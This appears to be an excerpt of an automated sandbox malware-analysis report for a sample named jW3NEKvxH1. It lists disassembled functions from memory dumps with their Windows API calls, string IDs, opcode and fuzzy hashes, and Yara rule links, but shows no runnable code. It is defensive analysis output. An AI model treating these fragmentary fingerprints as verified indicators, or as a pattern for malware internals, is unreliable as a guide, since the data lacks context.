                                                                                                                        • Instruction Fuzzy Hash: FBC1BF70D442499BDF15DFA8CCC8BADBBF5AF0A314F049196EA14A73D1C7308982CB65
                                                                                                                        Function 02DF9011 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6cf563653d4af7fa13662feff9878e6b3d813d0a121b78138781980ce1d9de76
                                                                                                                        • Instruction ID: 57f765afbf06a85c303f3de858e0ddd19f6cff8433a94bfa66393e6116a86743
                                                                                                                        • Opcode Fuzzy Hash: 6cf563653d4af7fa13662feff9878e6b3d813d0a121b78138781980ce1d9de76
                                                                                                                        • Instruction Fuzzy Hash: 9541F771E00304AFD7249F78CC50BAABBA9EB88724F21862AE255DB780D771DD418B94
                                                                                                                        Function 02D3E1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02D3E297
                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02D3E2B3
                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02D3E32A
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 02D3E353
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 920484758-0
                                                                                                                        • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                        • Instruction ID: e2e484100908545bb5f9022961810dbd12a99adf3ffd91b0db58a04e2ccddb00
                                                                                                                        • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                        • Instruction Fuzzy Hash: D941F879A012299BCB62DB58CD90BC9B3BDFF49314F0042D5E649A7352DA30AF81CF60
                                                                                                                        Function 02D3AD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D3AD59
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D3AD7D
                                                                                                                        • GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D3AD98
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D3AE2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        • Opcode ID: 4d08873c9e656c8284f1f66155cbef20762d61f8fd88804b594e82f47c9db8fc
                                                                                                                        • Instruction ID: 8fad48b0b06d5db2c5e39bd5a3f0e2aa899c30d1da657dba45619717d8e0b95c
                                                                                                                        • Opcode Fuzzy Hash: 4d08873c9e656c8284f1f66155cbef20762d61f8fd88804b594e82f47c9db8fc
                                                                                                                        • Instruction Fuzzy Hash: FC411B71A402589BDB62DB68DC84BDAB7FDEB08340F4440E6A588E7341DB749F84CFA4
                                                                                                                        Function 02D3AD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02D3AD59
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02D3AD7D
                                                                                                                        • GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D3AD98
                                                                                                                        • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02D3AE2E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3990497365-0
                                                                                                                        • Opcode ID: 1fc83578641176beff838688dc3c104e67093cbb872688ddd107d20355a41d76
                                                                                                                        • Instruction ID: 491392e9e72bd286826fc66fe7b3f8f877ec24b401a1a730bcb1546dc7dee7ce
                                                                                                                        • Opcode Fuzzy Hash: 1fc83578641176beff838688dc3c104e67093cbb872688ddd107d20355a41d76
                                                                                                                        • Instruction Fuzzy Hash: 95411B70A402589BDB62DB68DC84BDAB7FDAB08341F4400E6A588E7341DB749F84CFA4
                                                                                                                        Function 02DEF396 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02DEF3B2
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02DEF3CB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1426506684-0
                                                                                                                        • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                        • Instruction ID: 79fbe85908e9838094c53cc51e4b645efedd0a5d0c2bc67fe36e86d2611ca256
                                                                                                                        • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                        • Instruction Fuzzy Hash: 4B01D432119315AEEE6437797C84B672B4AFB01779F20023EF729867E2EF528C40D568
                                                                                                                        Function 02DBF01C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 3519838083-1296849874
                                                                                                                        • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                                        • Instruction ID: c3078118a5255e0d9e6194cfa7e17d77942fa747c618f1f29635e7920a72fd34
                                                                                                                        • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                                        • Instruction Fuzzy Hash: C1511972900208EACB06FBA4DCB5AED777AEF11300F904159B94797690EF249F498FA1
                                                                                                                        Function 02DD274B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp_wcslen
                                                                                                                        • String ID: ?
                                                                                                                        • API String ID: 1846113162-1684325040
                                                                                                                        • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                        • Instruction ID: 8b6a0e0f73de7a13b777a22d2234d9ac92c2502cf60f66e50df1c3dc8fde7dff
                                                                                                                        • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                                        • Instruction Fuzzy Hash: B3416275548706ABD720DFA0EC4CA9BB7ECFB44715F00093AF945C2262EB74DA48CB92
                                                                                                                        Function 02DEAC7C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 103COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: LG$XG
                                                                                                                        • API String ID: 0-1482930923
                                                                                                                        • Opcode ID: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
                                                                                                                        • Instruction ID: 7f3ca282342be6e7730739d30b0bd7bbb52eaf198c1dc66fe8a580ac14f7efef
                                                                                                                        • Opcode Fuzzy Hash: 66ef9e05317a77fc50b7f8bb6c436893fd1b94a9827f47d0b5a451204cd6ab0b
                                                                                                                        • Instruction Fuzzy Hash: 5231B775900705AFDF61EFA8D84079D77B5DB41329F10816AD81AAB3D0E7B4DD40CBA4
                                                                                                                        Function 02DB901E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strftime
                                                                                                                        • String ID: \=G$t=G
                                                                                                                        • API String ID: 1867682108-3587614975
                                                                                                                        • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                                        • Instruction ID: 5aa2128500e8e3c1f7677576e26563fea809e16ab85f9ff2548d31ac1a7c2062
                                                                                                                        • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                                                                                        • Instruction Fuzzy Hash: 66313D31505381DBC315EF24DC75ADE77AAEF94310F408939A29A832B0EF709949CF6A
                                                                                                                        Function 02DC23E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02DEAE35: __onexit.LIBCMT ref: 02DEAE3B
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 02DC2437
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Init_thread_footer__onexit
                                                                                                                        • String ID: ,]G$0]G
                                                                                                                        • API String ID: 1881088180-589576501
                                                                                                                        • Opcode ID: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                                                        • Instruction ID: b4e6fc0814703a3a2f45ce811b30a78eb810b992857e904a036d1e9f7b373f51
                                                                                                                        • Opcode Fuzzy Hash: de3fba35412e8d9275b285bd9e157dc8c129506901d01536abad46e7e0bd6fc8
                                                                                                                        • Instruction Fuzzy Hash: 6C218D31A0061A9BCB15FBA4D8A4AED7376EF50300F60442ADA47673D1EF746D4ACEA4
                                                                                                                        Function 02D31C6C Relevance: 5.3, APIs: 4, Instructions: 330COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6ff90cccddef8d184bac6c69ef60313b0c36356a638dbd310e44b3ec5349f92d
                                                                                                                        • Instruction ID: db24640ba3045def2927ed36c69c00c7e536d22f333b6a2546930e54dc394620
                                                                                                                        • Opcode Fuzzy Hash: 6ff90cccddef8d184bac6c69ef60313b0c36356a638dbd310e44b3ec5349f92d
                                                                                                                        • Instruction Fuzzy Hash: BFA1F5A77106024BD71AAA7CEC903ADB3D2DBC5325F18827EE11DCB381EB64CD46C660
                                                                                                                        Function 02D394EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02D395DA), ref: 02D39572
                                                                                                                        • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02D395DA), ref: 02D39578
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DateFormatLocaleThread
                                                                                                                        • String ID: yyyy
                                                                                                                        • API String ID: 3303714858-3145165042
                                                                                                                        • Opcode ID: fc9e65abf2907760376744114d0d2b6da99809ddf990ea7ab5066061c7e724bf
                                                                                                                        • Instruction ID: c00453038dce1ead7c8c454b78fb480b82f3e0100bb65083f692aa83d7a61c23
                                                                                                                        • Opcode Fuzzy Hash: fc9e65abf2907760376744114d0d2b6da99809ddf990ea7ab5066061c7e724bf
                                                                                                                        • Instruction Fuzzy Hash: D5218172A042589FDB12DFA8C891AEEB3B9EF09710F5140A5E845E7350D774DE80CFA5
                                                                                                                        Function 02D48338 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                        • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D483C2), ref: 02D483A4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CacheFlushInstruction
                                                                                                                        • String ID: FlushInstructionCache$Kernel32
                                                                                                                        • API String ID: 3811539418-184458249
                                                                                                                        • Opcode ID: dd7b4757b97bf688166755cfe30f3dfbd164df628d99ed34b4bcee6c45f51314
                                                                                                                        • Instruction ID: 9263d0a67a8e84638f6725ac3ab9378272a415be832781c6028685969553da52
                                                                                                                        • Opcode Fuzzy Hash: dd7b4757b97bf688166755cfe30f3dfbd164df628d99ed34b4bcee6c45f51314
                                                                                                                        • Instruction Fuzzy Hash: 6C014B72740344EFEB02EEA4EC51B5A77ADEB49B40F514460B940D6740DA74AD109A24
                                                                                                                        Function 02DEB9A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02DEB9AE
                                                                                                                          • Part of subcall function 02DEB963: std::exception::exception.LIBCONCRT ref: 02DEB970
                                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 02DEB9BC
                                                                                                                          • Part of subcall function 02DEC27F: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 02DEC28C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                        • String ID: T=G
                                                                                                                        • API String ID: 64778976-379896819
                                                                                                                        • Opcode ID: b8cbe4ebc7b41fd1c5cd74919f6de3e9f6675d661c96ad503d5562b8015eb70c
                                                                                                                        • Instruction ID: 30bb73a4becc9aec8eb79587044201d248a61e34b42a316422601e5fd9ea2f6e
                                                                                                                        • Opcode Fuzzy Hash: b8cbe4ebc7b41fd1c5cd74919f6de3e9f6675d661c96ad503d5562b8015eb70c
